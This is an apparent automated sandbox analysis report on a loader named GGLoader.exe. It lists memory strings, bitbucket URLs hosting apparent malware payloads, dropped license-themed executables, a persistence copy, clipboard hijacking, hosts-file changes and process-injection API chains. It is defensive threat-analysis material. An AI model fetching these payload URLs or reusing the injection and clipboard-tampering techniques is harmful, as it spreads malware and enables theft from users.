Source: lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223864605.00000202BFCB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 0000002C.00000002.2966233534.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224168182.00000202C0200000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 0000002C.00000000.2223723010.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2962436516.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000001.00000002.1925142827.000001EC40A84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512EA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512E8E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002512014C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2140674795.00000270C7706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2555004791.000001C52E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000002C.00000000.2225392956.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224168182.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2966233534.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224168182.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2966233534.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2972274642.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000028.00000002.2246120062.000001C51F62A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000036.00000000.2312885575.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002511E871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B7691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2228353344.0000000003141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51E8A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223723010.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2962436516.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: powershell.exe, 00000003.00000002.1768225702.000002511FF03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F372000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000028.00000002.2246120062.000001C51F62A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0~
Source: powershell.exe, 00000001.00000002.1960407447.000001EC48E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.t.com/pkiops/cersoft%20Time-Stam202010(1).crt0
Source: powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002511E871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B7691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51E8A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000026.00000002.2228353344.0000000003141000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000011.00000002.2039902997.00000270B9567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B9541000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aui-cdn.atlassian.com/
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: powershell.exe, 00000001.00000002.1828229655.000001EC319F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31666000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/5940jg9834/gf3443f3/raw/
Source: powershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfa
Source: powershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe
Source: powershell.exe, 00000001.00000002.1964124917.000001EC48EA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/B
Source: powershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.ex
Source: powershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.cookielaw.org/
Source: powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31BC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: powershell.exe, 00000028.00000002.2246120062.000001C51F62A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1768225702.000002511F4A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C520930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000028.00000002.2580308005.000001C536C2C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co&
Source: powershell.exe, 00000001.00000002.1925142827.000001EC40A84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512EA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512E8E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002512014C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2140674795.00000270C7706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2555004791.000001C52E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F6B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1768225702.000002511FF03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F372000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000003.00000002.1768225702.000002511FF03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F372000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: svchost.exe, 00000035.00000003.2349769567.000001D5599A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49730 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_00792B90 OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree, 6_2_00792B90
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_00792B90 OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree, 6_2_00792B90
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BE2B90 OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree, 35_2_00BE2B90
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_00792C80 OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard, 6_2_00792C80

Spam, unwanted Advertisements and Ransom Demands
barindex
Modifies the hosts file
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior

System Summary
barindex
Drops large PE files
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe File dump: svcupdater.exe.6.dr 831814656 Jump to dropped file
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\LicenseGet.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\LicCheck.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\LicSend.exe Jump to dropped file
Uses powercfg.exe to modify the power settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_00793F90 IsDebuggerPresent,GetModuleHandleW,GetProcAddress,GetTickCount64,NtDelayExecution,GetTickCount64, 6_2_00793F90
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Code function: 7_2_00007FF7D3B994C0 NtCreateUserProcess, 7_2_00007FF7D3B994C0
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BE3F90 IsDebuggerPresent,GetModuleHandleW,GetProcAddress,GetTickCount64,NtDelayExecution,GetTickCount64, 35_2_00BE3F90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAB02CE NtUnmapViewOfSection, 40_2_00007FFD9BAB02CE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAAF0E0 NtResumeThread, 40_2_00007FFD9BAAF0E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAAF0C0 NtSetContextThread, 40_2_00007FFD9BAAF0C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAB06C8 NtResumeThread, 40_2_00007FFD9BAB06C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAB04ED NtWriteVirtualMemory,NtSetContextThread, 40_2_00007FFD9BAB04ED
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 42_2_00000001400010C0
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC642A7C NtEnumerateValueKey,NtEnumerateValueKey, 43_2_00000225DC642A7C
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_00793B60: GetSystemInfo,GlobalMemoryStatusEx,CreateFileA,DeviceIoControl,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 6_2_00793B60
Creates files inside the system directory
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Deletes files inside the Windows folder
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_gckjyekc.li0.ps1
Detected potential crypto function
Source: C:\Users\user\Desktop\GGLoader.exe Code function: 0_2_00007FFD9B8842F6 0_2_00007FFD9B8842F6
Source: C:\Users\user\Desktop\GGLoader.exe Code function: 0_2_00007FFD9B8850A2 0_2_00007FFD9B8850A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8A4455 1_2_00007FFD9B8A4455
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007A3210 6_2_007A3210
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007946E0 6_2_007946E0
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007B604D 6_2_007B604D
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_0079A030 6_2_0079A030
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007910E0 6_2_007910E0
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007921D0 6_2_007921D0
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007BE3AE 6_2_007BE3AE
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_0079F3A0 6_2_0079F3A0
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007B8469 6_2_007B8469
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_00796680 6_2_00796680
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_0079E740 6_2_0079E740
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007AB80E 6_2_007AB80E
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007AE890 6_2_007AE890
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_0079E9E0 6_2_0079E9E0
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_0079EC30 6_2_0079EC30
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007B3CF8 6_2_007B3CF8
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_00791D90 6_2_00791D90
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Code function: 7_2_00007FF7D3B952DC 7_2_00007FF7D3B952DC
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Code function: 7_2_00007FF7D3B976C0 7_2_00007FF7D3B976C0
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Code function: 7_2_00007FF7D3B97285 7_2_00007FF7D3B97285
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Code function: 7_2_00007FF7D3B97FD0 7_2_00007FF7D3B97FD0
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Code function: 7_2_00007FF7D3B9D770 7_2_00007FF7D3B9D770
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Code function: 7_2_00007FF7D3B952FD 7_2_00007FF7D3B952FD
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BEA030 35_2_00BEA030
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BE46E0 35_2_00BE46E0
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BEE9E0 35_2_00BEE9E0
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BE1D90 35_2_00BE1D90
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BE10E0 35_2_00BE10E0
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00C0604D 35_2_00C0604D
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BE21D0 35_2_00BE21D0
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BF3210 35_2_00BF3210
